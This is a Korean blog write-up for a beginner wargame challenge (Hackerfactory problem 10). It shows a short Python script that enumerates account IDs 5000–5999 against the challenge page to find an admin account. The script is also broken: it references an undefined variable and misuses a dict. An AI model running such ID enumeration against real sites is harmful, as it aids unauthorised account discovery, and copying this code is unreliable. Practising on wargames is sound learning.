-
Hackerfactory 초급 10번 문제풀이webhacking/Hackerfactory 2018. 11. 13. 22:34반응형
1~2000까지 guest
5000~6000 인가된 계정
여기서 admin계정 하나를 찾아야한다.
결론 자동화가 필요함.
import requests
url = "https://hackerfactory.co.kr/wargame/war10/MyPage.php"
text = "<script>location.href='http://www.hackerfactory.co.kr/bbs/login.php'</script><script>alert('존재하지 않는 회원입니다.');history.back(-1);</script>"
for i in range(5000,6000):
send = {'sid' : i}
res = requests.post(url, data=d)
if(text != send.text):
print(i)
print(send.text)
풀렸는데 캡처본을 안만들어서
다시돌리기엔 시간이 많이걸려서..
결론은.. 풀었습니다.
반응형'webhacking > Hackerfactory' 카테고리의 다른 글
Hackerfactory 초급 9번 문제풀이 (0) 2018.11.13 Hackerfactory 초급 8번 문제풀이 (0) 2018.11.12 Hackerfactory 초급 7번 문제풀이 (0) 2018.11.12 Hackerfactory 초급 6번 문제풀이 (0) 2018.11.12 Hackerfactory 초급 5번 문제풀이 (0) 2018.11.08